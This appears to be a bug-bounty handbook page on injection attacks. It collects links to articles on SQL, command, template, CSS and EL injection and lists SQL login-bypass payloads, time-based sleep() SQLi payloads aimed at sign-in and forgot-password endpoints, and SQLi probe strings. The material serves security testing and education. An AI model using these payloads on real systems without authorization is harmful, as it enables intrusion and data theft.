Bug Hunter Handbook

Injection

References for Injection Attacks


Last updated 3 years ago

Blogs / Articles:

  • Blind Command Injection - SSRF
  • Practical JSONP Injection
  • XSLT Server Side Injection Attacks
  • Log Injection
  • Remote Code Execution with EL Injection
  • Argument Injection
  • Argument Injection
  • Argument Injection
    • Video
  • AST Injection, Prototype Pollution to RCE
  • SSTI
  • Command Injection
  • CSS Injection
  • SQL Injection

Payloads / Cheatsheets:

Twitter Threads / Tips:

  • EL Injection

Tools:

Other References:

' or ''-'
" or ""-"
" or true--
' or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*

SpEL Injection

  • https://medium.com/@jonathanbouman/blind-sql-injection-at-fasteditor-hema-com-6ac140c0d1a3
  • https://threat.tevora.com/stop-collaborate-and-listen/
  • https://www.quora.com/What-is-command-injection-and-how-does-it-work/answer/Jobert-Abma?share=8502ef38&srid=kl8Z
  • https://gerbenjavado.com/manual-sql-injection-discovery-tips/
  • Practical JSONP Injection
  • https://contextis.com/blog/xslt-server-side-injection-attacks
  • https://disconnect3d.pl/2018/02/24/log-injection-aka-tailing-logs-is-unsafe/
  • https://betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html
  • https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2019/may/argument-injection-hammer/
  • https://staaldraad.github.io/post/2019-11-24-argument-injection/
  • https://docs.google.com/presentation/d/1U8r5CJs9dLOLO2-hj_bHidRMXugUl3ejv8Hdw6bDMv4/edit#slide=id.g29a70c6c35_0_68
  • https://www.youtube.com/watch?v=FHiJnw9TTX8
  • https://blog.p6.is/AST-Injection/#How-to-Detect
  • https://blog.isec.pl/beyond-ssti/
  • https://bad-jubies.github.io/Blind-SQLi-1/
  • https://www.quora.com/What-is-command-injection-and-how-does-it-work/answer/Jobert-Abma?share=8502ef38&srid=kl8Z
  • https://medium.com/@dimazarno/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17
  • https://medium.com/@tehmezovismayil/steal-input-datas-with-css-file-injection-bugbounty-449ba41a5092
  • https://ansar0047.medium.com/blind-sql-injection-detection-and-exploitation-cheatsheet-17995a98fed1
  • https://medium.com/sud0root/bug-bounty-writeups-exploiting-sql-injection-vulnerability-20b019553716
  • https://ismailtasdelen.medium.com/sql-injection-payload-list-b97656cfd66b
  • https://twitter.com/rodoassis/status/1438186092486877190?s=20
  • https://outpost24.com/blog/X-forwarded-for-SQL-injection
  • How I Escalated a Time-Based SQL Injection to RCE - https://jmrcsnchz.medium.com/how-i-escalated-a-time-based-sql-injection-to-rce-bbf0d68cb398
  • https://github.com/Gabriel-Labs/OOB-SQLi
  • https://github.com/xer0days/SQLi-Query-Tampering
  • https://twitter.com/Xer0Days/status/1292488714241941504?s=20
1. Time Based SQL Injection: Used payload: '+(select*from(select(sleep(20)))a)+' in phone number parameter value for sign-in endpoint. Don't miss sign-in parameters [Like username, email, otp] for SQLi check. #bugbountytips
2. Reflected XSS + CSRF to Account Takeover : )
Time based SQLi -> forgot password Endpoint
1. Payload used: '%2b(select*from(select(sleep(20)))a)%2b'
2. Endpoint: /Forgot password
Cheers. Do share your story in the comments if you got SQLi at a weird endpoint.
https://twitter.com/h1pmnh/status/1425831338234589184?s=20
Bug Bounty Tips: This is how to find sql-Injection 100% of the time
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||' <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
#bugbounty #BugBountyTips #SqlInjection